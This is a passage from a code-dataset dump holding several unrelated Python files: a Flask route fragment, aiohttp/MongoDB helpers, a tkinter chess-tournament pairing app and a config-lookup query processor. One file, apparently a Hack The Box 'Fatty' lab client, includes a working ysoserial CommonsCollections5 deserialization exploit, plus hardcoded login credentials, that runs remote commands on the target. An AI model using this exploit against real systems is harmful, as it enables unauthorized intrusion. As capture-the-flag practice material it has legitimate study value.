\n \"\"\"\n )\n images = [\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n )\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('instruction_routes.generic_reroute')\n )\n","repo_name":"openstax/research-wrst","sub_path":"wrst/routes/reading_training_routes.py","file_name":"reading_training_routes.py","file_ext":"py","file_size_in_byte":12145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30469868105","text":"import socket\nimport ssl\nimport hashlib\nimport time\nimport struct\nfrom tqdm import tqdm\nimport os\nimport base64\n\nhostname = '10.10.10.174'\nLOGIN = 65281\nLOGOFF = 4919\nACTION = 65433\nhost_port = 1338\n\ncontext = ssl._create_unverified_context()\n\n\ndef header():\n print(\"\"\"\\033[1m\\033[91m \n ,... \n .d' \"\" mm mm \n dM` MM MM \n mMMmm ,6\"Yb.mmMMmm mmMMmm `7M' `MF'\n MM 8) MM MM MM VA ,V \n MM ,pm9MM MM MM VA ,V \n MM 8M MM MM MM VVV \n.JMML.`Moo9^Yo.`Mbmo `Mbmo ,V \n ,V \n \\033[92mClient by \\033[93m[tn3k] \\033[91mOOb\\033[m \n \n\"\"\")\n\n\ndef help():\n print(\"\"\"Commands with 'A' require admin access\n\t * help - Show this message\n\t * exit - Close\n\t * files - List files in directory\n\t * open - Open file in directory\n\t * whoami - Show name and role\n\t * ping - Pong!\n\t A pwn - Executes command on target machine with ysoserial\n\t A changePW - Deserialize base64\n\t A uname - Run uname\n\t A users - List /home/\n\t A ipconfig - Run ifconfig\n\t A netstat - Run netstat\"\"\")\n\n\ndef timestamp():\n return int(time.time()).to_bytes(4, 'big')\n\n\ndef int_bytes(val):\n return val.to_bytes(4, 'big')\n\n\ndef hash_sha256(message, hexchar=False):\n m = hashlib.sha256()\n m.update(message)\n if hexchar:\n return m.hexdigest().upper()\n else:\n return m.digest()\n\n\ndef sign(message, sessid):\n return hash_sha256(message + \"clarabibi2019!\".encode() + sessid)\n\n\ndef message(messageType, message, sessionid):\n messageType = int_bytes(messageType)\n times = timestamp()\n length = len(message).to_bytes(4, 'big')\n signature = sign(messageType + times + sessionid + message, sessionid)\n ret = messageType\n ret += times\n ret += sessionid\n ret += signature\n ret += length\n ret += message\n return ret\n\n\ndef generatePwn(cmd):\n os.system('java -jar ysoserial.jar CommonsCollections5 \"{0}\" > exploit.ser'.format(cmd))\n with open('exploit.ser', 'rb') as fi: exploit = fi.read()\n return base64.b64encode(exploit)\n\n\ndef action(command):\n payload = []\n cmd = command[0]\n args = command[1:]\n num = len(command) - 1\n if cmd == 'pwn':\n cmd = 'changePW'\n args = [generatePwn(' '.join(args))]\n args[0] = args[0].decode()\n num = 1\n\n payload.append(int_bytes(len(cmd)))\n payload.append(cmd.encode())\n payload.append(int_bytes(num))\n if args != []:\n for arg in args:\n payload.append(int_bytes(len(arg)))\n payload.append(arg.encode())\n return b''.join(payload)\n\n\ndef messagerecv(message):\n size = message[173:177]\n size = struct.unpack('>i', size)[0]\n return message[-size:].decode()\n\n\ndef filerecv(message, header=False):\n if header:\n size = message[173:177]\n size = int(struct.unpack('>i', size)[0])\n return message[-size:], size\n else:\n return message\n\nheader()\nwith socket.create_connection((hostname, host_port)) as sock:\n with 
context.wrap_socket(sock, server_hostname=hostname) as ssock:\n sessionid = ssock.recv(128)\n username = \"qtc\"\n password = \"clarabibi\"\n hashed = hash_sha256((username + password + \"clarabibimakeseverythingsecure\").encode(), True)\n payload = (username + \":\" + hashed).encode()\n send = message(LOGIN, payload, sessionid)\n print(\"Logging in ...\")\n ssock.send(send)\n print(messagerecv(ssock.recv(2048)))\n print(\"Role: \" + messagerecv(ssock.recv(2048)))\n print('Type help for showing all commands')\n while True:\n command = input(\"[{0}$]: \".format('fatty')).split(\" \")\n if \"exit\" in command:\n exit()\n if \"help\" in command:\n help()\n continue\n send = message(ACTION, action(command), sessionid)\n ssock.send(send)\n if \"open\" in command:\n recv = ssock.recv(177)\n contentlist = []\n content, size = filerecv(recv, True)\n if size < 2048:\n recv = ssock.recv(2048)\n content = filerecv(recv, False).decode()\n print(content)\n else:\n reminder = size % 2048\n iterations = size // 2048\n if reminder:\n iterations += 1\n filename = os.path.basename(command[-1])\n\n for i in tqdm(range(iterations)):\n recv = ssock.recv(2048)\n content = filerecv(recv, False)\n contentlist.append(content)\n print(\"Writing file {0} in disk\".format(filename))\n with open(filename, \"wb\") as f:\n f.write(b''.join(contentlist))\n else:\n recv = messagerecv(ssock.recv(2048))\n if \"User object\" in recv:\n print(\"Payload delivered\")\n else:\n print(recv)\n","repo_name":"puckiestyle/python","sub_path":"htb-fattyclient.py","file_name":"htb-fattyclient.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"5489678065","text":"import functools\nimport json\n\nfrom aiohttp import web\n\nfrom config import config\nfrom server.handler import error\nfrom utils import set_logging\nfrom mongo_part import MongoConn\n\n\nclass ServerComponent:\n logger = set_logging(config.SERVER_LOGGER_NAME)\n db = MongoConn(\n config.MONGODB['host'],\n config.MONGODB['port'],\n config.MONGODB['db_name'],\n config.MONGODB['username'],\n config.MONGODB['password'],\n ).db\n\n\nasync def get_json_date(request, need_len=None):\n data = await request.content.read()\n data = data.decode()\n data = json.loads(data)\n ServerComponent.logger.info(data)\n if need_len is None or len(data) == need_len:\n return data\n\n\ndef check_remote(func):\n @functools.wraps(func)\n def wrapper(request):\n return func(request)\n return wrapper\n\n\ndef general_json_data(status, info_dict=None):\n status_data = {'status': status}\n if info_dict is not None:\n info_dict.update(status_data)\n else:\n info_dict = status_data\n return info_dict\n\n\ndef get_data(func):\n @functools.wraps(func)\n async def wrapper(request):\n get_json = await get_json_date(request)\n if get_json is not None:\n return func(get_json)\n else:\n return error.handle_400()\n return wrapper\n\n\ndef no_list():\n emtpy_list = []\n return json.dumps(emtpy_list)\n\n\ndef ok_response():\n res_data = general_json_data('ok')\n return web.json_response(data=res_data)\n","repo_name":"10000ms/link_now","sub_path":"aiohttp_mongdb_unit/server/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42383751675","text":"import tkinter as tk\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom Results import Results\r\nfrom Rot import *\r\nfrom Player 
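
message() above frames each packet as type | timestamp | session id | SHA-256 signature | payload length | payload, and messagerecv/filerecv read the big-endian length at bytes 173:177; a matching parser sketch (field offsets taken from the client code above):

import struct

def parse_payload(packet):
    # Payload length is a big-endian int32 at 173:177; the payload is the
    # final `size` bytes of the packet.
    size = struct.unpack('>i', packet[173:177])[0]
    return packet[-size:]
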
import Player\r\nfrom operator import itemgetter\r\nfrom itertools import groupby\r\n\r\nclass Tournament(tk.Frame):\r\n    def __init__(self, master=None, First_user_name = StringVar(), Second_user_name = StringVar(), \r\n                 player_one_id = 0, player_two_id = 0, First_player = 0, Second_player = 0, \r\n                 first_new_user_points = StringVar(), second_new_user_points = StringVar(), \r\n                 second_player_id = 0, first_player_id = 0, rounde = StringVar()):\r\n        tk.Frame.__init__(self, master)\r\n        self.First_user_name = StringVar()\r\n        self.Second_user_name = StringVar()\r\n        self.player_two_id = player_two_id\r\n        self.player_one_id = player_one_id\r\n        self.rounde = rounde\r\n        self.round = 1\r\n        self.player_one_oponents = [] \r\n        self.player_two_oponents = []\r\n        self.first_new_user_points = first_new_user_points\r\n        self.second_new_user_points = second_new_user_points\r\n        self.second_player_id = second_player_id\r\n        self.first_player_id = first_player_id\r\n        self.Tou_frame = ttk.Frame(self, padding=\"6 12 12 12\")\r\n        self.Tou_frame.grid(column=0, row=0, sticky=(N, W, E, S))\r\n        self.Tou_frame.columnconfigure(0, weight=1)\r\n        self.Tou_frame.rowconfigure(0, weight=1)\r\n        \r\n        self.scrollbar = Scrollbar(self.Tou_frame)\r\n        self.players_list = Listbox(self.Tou_frame, width = 55, height = 10, yscrollcommand=self.scrollbar.set, \r\n                                    exportselection=0)\r\n        self.scrollbar.config(command=self.players_list.yview)\r\n        \r\n        self.first_players_list = []\r\n        self.second_players_list = []\r\n        self.third_unpaired_list = []\r\n        self.list_of_players = []\r\n        self.pack()\r\n        self.createWidgets()\r\n        self.updateTable()\r\n\r\n    def __del__(self, master=None):\r\n        tk.Frame.__init__(self, master)\r\n\r\n    def next(self):\r\n        root3.deiconify()\r\n        app = Results(master=root3)\r\n        root2.withdraw()\r\n\r\n    def quit(self):\r\n        quitProgram()\r\n        root.quit() \r\n    \r\n    def add_points_to_players(self):\r\n        print(self.player_one_id)\r\n        print(self.player_two_id)\r\n        First_player = None\r\n        Second_player = None\r\n        \r\n        for item in self.list_of_players:\r\n            if item.user_id == self.player_one_id:\r\n                First_player = item\r\n            elif item.user_id == self.player_two_id: \r\n                Second_player = item \r\n        \r\n        if First_player == None and Second_player == None:\r\n            print(\"Error, missing ID\")\r\n        \r\n        added_first_user_points = int(self.first_new_user_points.get())\r\n        added_second_user_points = int(self.second_new_user_points.get())\r\n        first_user_points = First_player.user_points\r\n        second_user_points = Second_player.user_points\r\n        \r\n        if (added_first_user_points != None and added_second_user_points != None):\r\n            First_player.user_points = added_first_user_points + first_user_points\r\n            Second_player.user_points = added_second_user_points + second_user_points\r\n            First_player.oponents.append(Second_player.user_id)\r\n            Second_player.oponents.append(First_player.user_id)\r\n\r\n            if First_player.user_color[0] >= First_player.user_color[1]: \r\n                First_player.user_color[1] = First_player.user_color[1] + 1\r\n            else:\r\n                First_player.user_color[0] = First_player.user_color[0] + 1\r\n            \r\n            if Second_player.user_color[0] >= Second_player.user_color[1]: \r\n                Second_player.user_color[1] = Second_player.user_color[1] + 1\r\n            else:\r\n                Second_player.user_color[0] = Second_player.user_color[0] + 1\r\n            \r\n            First_player.user_round = First_player.user_round + 1\r\n            Second_player.user_round = Second_player.user_round + 1\r\n            \r\n            print(First_player.user_name, \" played a game against \", Second_player.user_name)\r\n            print(First_player.user_name, \"(\", First_player.user_id ,\") has already played against \", First_player.oponents)\r\n            print(Second_player.user_name, \"(\", Second_player.user_id , \") has already played against \", Second_player.oponents)\r\n            \r\n            print(\"Player \", First_player.user_name, \" received points: \", \r\n                  added_first_user_points, \"and now has\", First_player.user_points, \" - this is round \", \r\n                  First_player.user_round, \" for this player.\")\r\n            print(\"Player \", Second_player.user_name, \" received points: \", \r\n                  added_second_user_points, \"and now has\", Second_player.user_points, \" - this is round \", \r\n                  Second_player.user_round, \" for this player.\")\r\n        \r\n        self.first_new_user_points = StringVar()\r\n        self.second_new_user_points = StringVar()\r\n        self.First_user_name.set(\"\")\r\n        self.Second_user_name.set(\"\")\r\n        if (self.third_unpaired_list != []):\r\n            self.third_unpaired_list[0].user_points = self.third_unpaired_list[0].user_points + 1\r\n            print(\"Player\", self.third_unpaired_list[0].user_name, \" receives a bye, i.e. a point without playing.\")\r\n            print(self.third_unpaired_list[0].user_name, \" therefore now has: \", self.third_unpaired_list[0].user_points)\r\n            self.third_unpaired_list[0].user_round = self.third_unpaired_list[0].user_round + 1\r\n            self.third_unpaired_list[0].free_point = 1\r\n        self.updateTable()\r\n        self.add_points(DISABLED)\r\n\r\n    def add_points(self, status):\r\n        if status == ACTIVE:\r\n            Add_new_user = ttk.Button(self.Tou_frame, text=\"Award points\", \r\n                                      command = self.add_points_to_players, state = ACTIVE)\r\n            Add_new_user.grid(column=3, row=5, sticky=W, pady=6, padx=6)\r\n            Results_button = ttk.Button(self.Tou_frame, state = DISABLED, \r\n                                        text=\"Show final results >>\", command = self.next)\r\n            Results_button.grid(column=3, row=6, sticky=W, pady=6, padx=6)\r\n            Search_players_button = ttk.Button(self.Tou_frame, text=\"Draw players\", state = DISABLED)\r\n            Search_players_button.grid(column=3, row=3, sticky=W, pady=6, padx=6)\r\n            \r\n            First_player_points_box = Spinbox(self.Tou_frame, from_=0.0, to=10000.0,\r\n                                              textvariable=self.first_new_user_points, state = NORMAL)\r\n            First_player_points_box.grid(column=1, row=5, sticky=(W, E), pady=6, padx=6)\r\n            Second_player_points_box = Spinbox(self.Tou_frame, from_=0.0, to=10000.0,\r\n                                               textvariable=self.second_new_user_points, state = NORMAL)\r\n            Second_player_points_box.grid(column=2, row=5, sticky=(W, E), pady=6, padx=6)\r\n            print(\"ACTIVE\")\r\n        \r\n        if status == DISABLED:\r\n            Add_new_user = ttk.Button(self.Tou_frame, text=\"Award points\", state = DISABLED)\r\n            Add_new_user.grid(column=3, row=5, sticky=W, pady=6, padx=6)\r\n            Results_button = ttk.Button(self.Tou_frame, state = ACTIVE, text=\"Show final results >>\", \r\n                                        command = self.next)\r\n            Results_button.grid(column=3, row=6, sticky=W, pady=6, padx=6)\r\n            Search_players_button = ttk.Button(self.Tou_frame, text=\"Draw players\", \r\n                                               command = self.look_for_players, state = ACTIVE)\r\n            Search_players_button.grid(column=3, row=3, sticky=W, pady=6, padx=6)\r\n            \r\n            First_player_points_box = Spinbox(self.Tou_frame, from_=0.0, to=10000.0,\r\n                                              textvariable=self.first_new_user_points, state = DISABLED)\r\n            First_player_points_box.grid(column=1, row=5, sticky=(W, E), pady=6, padx=6)\r\n            Second_player_points_box = Spinbox(self.Tou_frame, from_=0.0, to=10000.0,\r\n                                               textvariable=self.second_new_user_points, state = DISABLED)\r\n            Second_player_points_box.grid(column=2, row=5, sticky=(W, E), pady=6, padx=6)\r\n            print(\"DISABLED\")\r\n    \r\n    def updateTable(self):\r\n        self.players_list = Listbox(self.Tou_frame, width = 55, height = 10, yscrollcommand=self.scrollbar.set, \r\n                                    exportselection=0)\r\n        i = 0\r\n        print(\"Sorted list\")\r\n        sort_list = sorted(Player._registry, key=lambda player: player.user_points, reverse=True)\r\n        print(sort_list)\r\n        for item in sort_list:\r\n            len_of_name = len(item.user_name)\r\n            user_space = 20 - len_of_name\r\n            user_line =\" \"\r\n            for _ in range(user_space):\r\n                user_line +=\" \"\r\n            user_line = item.user_name + str(user_line) + str(item.user_points) \r\n            user_line += str(\" pts, \") + str(\" rounds played: \") + str(item.user_round - 1) \r\n            self.players_list.insert(i, user_line)\r\n            i += 1\r\n        \r\n        List_of_users = ttk.Label(self.Tou_frame, text=\"Participants' results:\")\r\n        List_of_users.grid(column=6, row=1, sticky=W)\r\n        \r\n        self.players_list.grid(column=6, columnspan=2, row=2, rowspan = 2, sticky=N, pady=6)\r\n        self.scrollbar.grid(column=8, columnspan=2, row = 2, rowspan = 4, sticky=N, pady = 7, ipady = 55)\r\n        \r\n    def createWidgets(self):\r\n        ttk.Label(self.Tou_frame, text=\"Award points to the players selected by the system\").grid(\r\n            column=2, columnspan=2, row=1, sticky=W, pady=6)\r\n        \r\n        # 1 Column\r\n        First_player_points_entry = ttk.Entry(self.Tou_frame, width=7, textvariable=self.First_user_name,\r\n                                              state = DISABLED)\r\n        First_player_points_entry.grid(column=1, row=3, sticky=(W, E), pady=6, padx=6)\r\n        ttk.Label(self.Tou_frame, text=\"Full name:\").grid(column=1, row=2, sticky=W, pady=6, padx=6)\r\n        ttk.Label(self.Tou_frame, text=\"Ranking points:\").grid(column=1, row=4, sticky=W, pady=6, padx=6)\r\n\r\n        # 2 Column\r\n        Second_player_points_entry = ttk.Entry(self.Tou_frame, width=7, \r\n                                               textvariable=self.Second_user_name, state = DISABLED)\r\n        Second_player_points_entry.grid(column=2, row=3, sticky=(W, E), pady=6, padx=6)\r\n        ttk.Label(self.Tou_frame, text=\"Full name:\").grid(column=2, row=2, sticky=W, pady=6, padx=6)\r\n        ttk.Label(self.Tou_frame, text=\"Ranking points:\").grid(column=2, row=4, sticky=W, pady=6, padx=6)\r\n        \r\n        # 6 Row\r\n        Button_End_Program = ttk.Button(self.Tou_frame, text=\"Quit\", command=self.quit)\r\n        Button_End_Program.grid(column=5, row=6, sticky=W, pady=6, padx=6)\r\n\r\n        self.rounde.set(self.round)\r\n        ttk.Label(self.Tou_frame, text=\"Round:\").grid(column=1, row=6, sticky=W)\r\n        ttk.Label(self.Tou_frame, textvariable=self.rounde).grid(column=1, row=6, sticky=W, padx=30)\r\n        \r\n        self.add_points(DISABLED)\r\n        \r\n    def look_for_players(self):\r\n        if self.first_players_list == [] and self.second_players_list == []:\r\n            print(\"Current round:\", self.round)\r\n            self.create_list(\"rank\")\r\n            self.get_id_players()\r\n        else:\r\n            self.get_id_players()\r\n        \r\n    def get_id_players(self):\r\n        print(\"ID - Start\") \r\n        self.player_one_id = None\r\n        self.player_two_id = None\r\n        \r\n        if self.first_players_list != []:\r\n            print(\"ID - 1\")\r\n            for item in self.first_players_list:\r\n                if item.user_round == self.round:\r\n                    if item.user_color[0] < 3 and item.user_color[1] < 3:\r\n                        self.player_one_oponents = item.oponents\r\n                        self.player_one_id = item.user_id \r\n                        print(self.player_one_id)\r\n                        break\r\n                else:\r\n                    if self.round == len(self.list_of_players):\r\n                        self.next()\r\n                        return 0\r\n        else:\r\n            print(\"List no. 1 is empty!\") \r\n        \r\n        if self.second_players_list != []:\r\n            print(\"ID - 2\") \r\n            for item in self.second_players_list:\r\n                if item.user_round == self.round:\r\n                    self.player_two_oponents = item.oponents\r\n                    if self.player_one_id not in self.player_two_oponents:\r\n                        if item.user_color[0] < 3 and item.user_color[1] < 3:\r\n                            print(self.player_one_oponents)\r\n                            print(self.player_two_oponents)\r\n                            self.player_two_id = item.user_id\r\n                            \r\n                            print(self.player_two_id)\r\n                            break\r\n                else:\r\n                    if self.round == len(self.list_of_players):\r\n                        self.next()\r\n                        return 0\r\n        else:\r\n            print(\"List no. 2 is empty!\") \r\n        print(\"ID - End\") \r\n        self.next_round()\r\n        \r\n    def next_round(self):\r\n        if self.player_one_id != None and self.player_two_id != None:\r\n            pass\r\n        else:\r\n            self.round += 1\r\n            print(\"Current round:\", self.round)\r\n            self.create_list(\"points\")\r\n            self.get_id_players()\r\n        self.take_id_and_get_players()\r\n        self.createWidgets()\r\n        self.add_points(ACTIVE)\r\n\r\n    def take_id_and_get_players(self):\r\n        print(\"TAKE ID\")\r\n        player = Player\r\n        for player in player._registry:\r\n            if player.user_id == self.player_one_id:\r\n                First_player = player\r\n                self.First_user_name.set(First_player.user_name) \r\n                print(First_player.user_name)\r\n            else:\r\n                continue\r\n        \r\n        for player in player._registry:\r\n            if player.user_id == self.player_two_id: \r\n                Second_player = player\r\n                self.Second_user_name.set(Second_player.user_name) \r\n                print(Second_player.user_name)\r\n            else:\r\n                continue\r\n        \r\n    def create_list(self, user_type):\r\n        i = 0\r\n        self.list_of_players = []\r\n        self.first_players_list = []\r\n        self.second_players_list = []\r\n        self.third_unpaired_list = []\r\n        \r\n        for player in Player._registry:\r\n            self.list_of_players.append(player)\r\n            i +=1\r\n        print(\"List of participants\")\r\n        print(self.list_of_players)\r\n        \r\n        if user_type == \"points\":\r\n            self.list_of_players = sorted(Player._registry, key=lambda player: player.user_points, reverse=True)\r\n        if user_type == \"rank\":\r\n            self.list_of_players = sorted(Player._registry, key=lambda player: player.user_rank)\r\n        print(\"Sorted list\")\r\n        print(self.list_of_players)\r\n        \r\n        i = 0\r\n        number_of_players = int((len(self.list_of_players))) \r\n        \r\n        if user_type == \"points\":\r\n            \r\n            if number_of_players % 2 != 0:\r\n                for item in self.list_of_players:\r\n                    i += 1\r\n                    if i == number_of_players and item.free_point != 1:\r\n                        self.third_unpaired_list.append(item)\r\n                    elif i % 2 == 1 and item.free_point == 1:\r\n                        self.second_players_list.append(item) \r\n                        item.free_point = 0\r\n                    elif i % 2 == 0 and item.free_point == 1:\r\n                        self.first_players_list.append(item) \r\n                        item.free_point = 0\r\n                    elif i % 2 == 1:\r\n                        self.second_players_list.append(item) \r\n                    elif i % 2 == 0:\r\n                        self.first_players_list.append(item) \r\n            \r\n            else:\r\n                for item in self.list_of_players:\r\n                    i += 1\r\n                    if i % 2 == 1:\r\n                        self.second_players_list.append(item) \r\n                    elif i % 2 == 0:\r\n                        self.first_players_list.append(item) \r\n        \r\n        if user_type == \"rank\":\r\n            \r\n            if number_of_players % 2 != 0:\r\n                for item in self.list_of_players:\r\n                    i += 1\r\n                    if i > int(number_of_players/2) and i < int(number_of_players):\r\n                        self.second_players_list.append(item) \r\n                    elif i <= int(number_of_players/2):\r\n                        self.first_players_list.append(item) \r\n                    else:\r\n                        self.third_unpaired_list.append(item) \r\n            else:\r\n                for item in self.list_of_players:\r\n                    i += 1\r\n                    if i > int(number_of_players/2):\r\n                        self.second_players_list.append(item) \r\n                    else:\r\n                        self.first_players_list.append(item) \r\n        \r\n        print(\"List split\")\r\n        print(\"List no. 1\")\r\n        print(self.first_players_list) \r\n        print(\"List no. 2\") \r\n        print(self.second_players_list)\r\n        print(\"List no. 3 (unpaired)\") \r\n        print(self.third_unpaired_list)\r\n","repo_name":"MateuszG/Chess-system","sub_path":"Tournament.py","file_name":"Tournament.py","file_ext":"py","file_size_in_byte":17615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"19003772588","text":"\"\"\"\nKheops controller\n\nMain Kheops model classes\n\"\"\"\n\nimport json\nimport logging\n\n# from pprint import pprint\n\nfrom pathlib import Path\nfrom prettytable import PrettyTable\n\nimport kheops.plugin as KheopsPlugins\nfrom kheops.utils import render_template_python, str_ellipsis\n\n\nlog = logging.getLogger(__name__)\ntracer = logging.getLogger(f\"{__name__}.explain\")\n\n\n\n# Helper classes\n# ------------------------\n\nclass LoadPlugin:\n    \"\"\"Kheops plugins loader\n\n    This plugin loader is a helper to load a python module (Kheops Plugin) from\n    a plugin kind and name.\n    \"\"\"\n\n    def __init__(self, plugins):\n        self.plugins = plugins\n\n    def load(self, kind, name):\n        \"\"\"\n        Load a plugin\n        \"\"\"\n\n        assert isinstance(name, str), f\"Got: {name}\"\n\n        # Get plugin kind\n        try:\n            plugins = getattr(self.plugins, kind)\n        except AttributeError as err:\n            raise Exception(f\"Unknown module kind '{kind}': {err}\") from err\n\n        # Get plugin class\n        try:\n            plugin_cls = getattr(plugins, name)\n        except AttributeError as err:\n            raise Exception(f\"Unknown module '{kind}.{name}': {err}\") from err\n\n        assert hasattr(\n            plugin_cls, \"Plugin\"\n        ), f\"Plugin {kind}/{name} is not a valid plugin\"\n\n        # Return the plugin class\n        return plugin_cls.Plugin\n\nclass BackendCandidate():\n    \"\"\"Backend Candidate\n\n    This object represents a backend candidate. It holds the value of the\n    requested key, but also its source path, the status and some other metadata.\n    \"\"\"\n\n    def __init__(self, path=None, data=None, run=None, status=None):\n        assert isinstance(run, dict)\n        self.path = path\n        self.status = status or \"unparsed\"\n        self.run = run or {}\n        self.data = data or None\n\n    def __repr__(self):\n        return f\"Status: {self.status}, Path: {self.path} => {self.data}\"\n\n\nclass Query:\n    \"\"\"Query object\n\n    Object that holds the key and scope.\n    \"\"\"\n\n    key = None\n    scope = None\n\n    def __init__(self, key, scope):\n        self.key = key or None\n        self.scope = scope or {}\n\n        self.rule = None\n\n\n# Query Processor class\n# ------------------------\n\nclass QueryProcessor:\n    \"\"\"QueryProcessor\n\n    This class helps perform queries for a given key and scope. It provides a single\n    public method. 
It also implements an explain mechanism to help troubleshoot query\n    lookup issues.\n\n    The query process consists of:\n      * Create a new query with the key and the scope\n      * Fetch and expand the lookup list (_exec_assemble_lookups)\n      * Fetch the rule that matches the key (_exec_get_rule)\n      * Fetch the strategy that matches the key\n      * Query all backends with lookup list (_exec_backend_plugins)\n      * Return result\n\n    \"\"\"\n\n    default_match_rule = {\n        \"key\": None,\n        \"continue\": False,\n        \"strategy\": \"merge_schema\",\n    }\n\n    default_lookup_item = {\n        \"path\": None,\n        \"backend\": \"file\",\n        \"continue\": True,\n    }\n\n    def __init__(self, config):\n        self.plugin_loader = LoadPlugin(KheopsPlugins)\n        self.config = config\n\n    # Query methods\n    # ------------------------\n\n    def query(self, key=None, scope=None, explain=False):\n        \"\"\"Query key with scope\n\n        \"\"\"\n\n        if explain:\n            tracer.setLevel(logging.DEBUG)\n\n        query = Query(key, scope)\n        log.info(\"Creating new query: %s\", query.__dict__)\n\n        # Match the KeyRule in keys (RULE CACHE)\n        # Get the matching keys\n        # Assemble if more than one and merge when continue.\n        # Got the Matched rule (RULE CACHE)\n        # We'll need the strategy, and its selector field: matched/first/last/all\n        key_rule = self._exec_get_rule(query)\n        log.info(\"Matched rule for key '%s': %s\", query.key, key_rule)\n\n        # Build the lookups [] => []\n        # Fetch static config from app (for include and NS:includes ...)\n        # Loop over lookups and process each lookup with ScopePlugins\n        lookups = self.config[\"lookups\"].copy()\n        parsed_lookups = self._exec_assemble_lookups(lookups, query)\n\n        # Generate explain report\n        if explain:\n            self._explain_lookups(parsed_lookups)\n\n        # Fetch the module\n        # Retrieve the module instance\n        plugin_name = key_rule.get(\"strategy\", None)\n        strategy_plugin = self.plugin_loader.load(\"strategy\", plugin_name)(self)\n\n        # Get the data (strategy.selector)\n        # For each entry, ask the backend to return the data: file, http, consul ...\n        # Return zero, one or more results depending on the strategy.selector\n        # result = get_backends_results(strategy, lookups)\n        candidates = self._exec_backend_plugins(\n            parsed_lookups, selector=strategy_plugin.selector\n        )\n\n        # Generate explain report\n        if explain:\n            self._explain_candidates(candidates, query)\n\n        # Apply the merge strategy, recall strategy\n        result = strategy_plugin.merge_results(candidates, key_rule, query)\n\n        # TODO: Apply output plugins\n        # result = self._exec_output_plugins(result)\n\n        return result\n\n\n    # Query parts methods\n    # ------------------------\n\n    def _exec_get_rule(self, query, mode=\"match\"):\n\n        key = query.key\n        rules = self.config[\"rules\"] or {}\n\n        if mode == \"match\":\n            rule = dict(self.default_match_rule)\n            rules = [i for i in rules if i.get(\"key\", None) == key]\n            if len(rules) > 0:\n                match = rules[0]\n                rule.update(match)\n            else:\n                log.debug(\"Applying default rule for key '%s'\", key)\n                rule = self.default_match_rule\n        else:\n            raise Exception(f\"Mode '{mode}' is not implemented\")\n\n        return rule\n\n\n    def _exec_assemble_lookups(self, lookups, query):\n\n        assert isinstance(lookups, list)\n        assert len(lookups) > 0\n\n        # Init the scope list\n        new_lookups1 = []\n        for index, lookup_def in enumerate(lookups):\n            #shortform = False\n\n            if isinstance(lookup_def, str):\n                #shortform = True\n                lookup_def = {\n                    \"path\": lookup_def,\n                }\n            assert isinstance(lookup_def, dict)\n\n            new_lookup = dict(self.default_lookup_item)\n            new_lookup.update(lookup_def)\n            new_lookup[\"_run\"] = {\n                \"scope\": query.scope,\n                \"key\": query.key,\n                \"conf\": {\n                    \"index\": index,\n                }\n                # 'shortform': shortform,\n            }\n            new_lookups1.append(new_lookup)\n\n        # Apply lookup modules\n        new_lookups2 = []\n        for index, lookup in enumerate(new_lookups1):\n            plugins = lookup.get(\"scope\", [])\n\n            ret = [lookup]\n            for plugin_def in plugins:\n                plugin_name = plugin_def.get(\"module\", None)\n\n                if plugin_name:\n                    plugin = self.plugin_loader.load(\"scope\", plugin_name)(namespace=self)\n                    ret = plugin.process_items(ret, plugin_def)\n\n            new_lookups2.extend(ret)\n\n        # Parse the `path` value with scope variables\n        new_lookups3 = []\n        for lookup in new_lookups2:\n            path = lookup[\"path\"]\n            scope = lookup[\"_run\"][\"scope\"]\n            new_path = render_template_python(path, scope, ignore_missing=False)\n            if new_path:\n                lookup[\"_run\"][\"raw_path\"] = path\n                lookup[\"path\"] = new_path\n                new_lookups3.append(lookup)\n            else:\n                log.warning(\"Ignore lookup item because of missing scope vars: '%s'\", path)\n\n        return new_lookups3\n\n\n    def _exec_backend_plugins(self, lookups, selector=\"matched\"):\n        assert selector in [\"last\", \"first\", \"all\", \"matched\"]\n        assert isinstance(lookups, list)\n        # lookups = self.config.get(\"lookups\", {}).copy()\n\n        plugins = {}\n        ret = []\n        for index, lookup_def in enumerate(lookups):\n\n            # Update object\n            lookup_def[\"_run\"][\"backend_index\"] = index\n\n            # Load plugin (cached per backend name)\n            plugin_name = lookup_def[\"backend\"]\n            if plugin_name in plugins:\n                plugin = plugins[plugin_name]\n            else:\n                plugin = self.plugin_loader.load(\"backend\", plugin_name)(namespace=self)\n                plugins[plugin_name] = plugin\n\n            # Get candidates\n            candidates = plugin.fetch_data(lookup_def)\n\n            # Apply selector\n            for candidate in candidates:\n                if candidate.status == \"found\" or selector == \"all\":\n                    ret.append(candidate)\n\n        return ret\n\n    # Explain methods\n    # ------------------------\n\n    def _explain_lookups(self, parsed_lookups):\n        \"\"\"Explain list of lookups\"\"\"\n\n        table = PrettyTable()\n        for item in parsed_lookups:\n            col1 = json.dumps(\n                {k: v for k, v in item.items() if k not in [\"_run\"]},\n                default=lambda o: \"\",\n                indent=2,\n            )\n            col2 = json.dumps(\n                item[\"_run\"], default=lambda o: \"\", indent=2\n            )\n            table.add_row(\n                [\n                    \"\\nConfig:\" + str_ellipsis(col1, 60),\n                    \"\\nRuntime:\" + str_ellipsis(col2, 60),\n                ]\n            )\n        table.field_names = [\"Config\", \"Runtime\"]\n        table.align = \"l\"\n        tracer.info(\"Explain lookups:\\n%s\", str(table))\n\n    def _explain_candidates(self, candidates, query):\n        \"\"\"Explain list of candidates\"\"\"\n\n        table = PrettyTable()\n        for item_obj in candidates:\n            item = item_obj.__dict__\n            item[\"rel_path\"] = str(Path(item[\"path\"]).relative_to(Path.cwd()))\n\n            col1 = json.dumps(\n                {k: v for k, v in item.items() if k not in [\"run\", \"data\"]},\n                default=lambda o: \"\",\n                indent=2,\n            )\n            col2 = json.dumps(\n                item[\"run\"][\"_run\"], default=lambda o: \"\", indent=2\n            )\n            col3 = (\n                item_obj.data.get(query.key, \"NOT FOUND\")\n                if query.key is not None and isinstance(item_obj.data, dict)\n                